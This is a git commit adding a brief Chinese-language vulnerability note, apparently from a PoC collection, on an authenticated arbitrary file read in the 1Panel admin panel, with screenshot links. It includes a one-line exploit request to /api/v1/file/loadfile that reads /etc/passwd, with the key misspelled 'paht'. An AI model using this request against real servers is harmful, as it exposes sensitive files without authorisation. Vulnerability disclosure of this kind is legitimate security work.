Add files via upload

2024-02-05 22:01:02 +08:00
parent 074473d760
commit 658d00e2b5
4 changed files with 17 additions and 0 deletions
--- a/后台文件读取漏洞.assets/image-20230815142616338.png
+++ b/后台文件读取漏洞.assets/image-20230815142616338.png
--- a/后台文件读取漏洞.assets/image-20230815142623048.png
+++ b/后台文件读取漏洞.assets/image-20230815142623048.png
--- a/后台文件读取漏洞.assets/image-20230815142629323.png
+++ b/后台文件读取漏洞.assets/image-20230815142629323.png
--- a/document/1Panel后台/1Panel
+++ b/document/1Panel后台/1Panel
@@ -0,0 +1,17 @@
+**漏洞描述**
+
+1Panel后台存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感信息文件
+
+POC
+
+POST /api/v1/file/loadfile {"paht":"/etc/passwd"}
+
+**漏洞复现**
+
+登陆页面
+
+![image-20230815142616338](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png)
+
+![image-20230815142623048](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png)
+
+![image-20230815142629323](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png)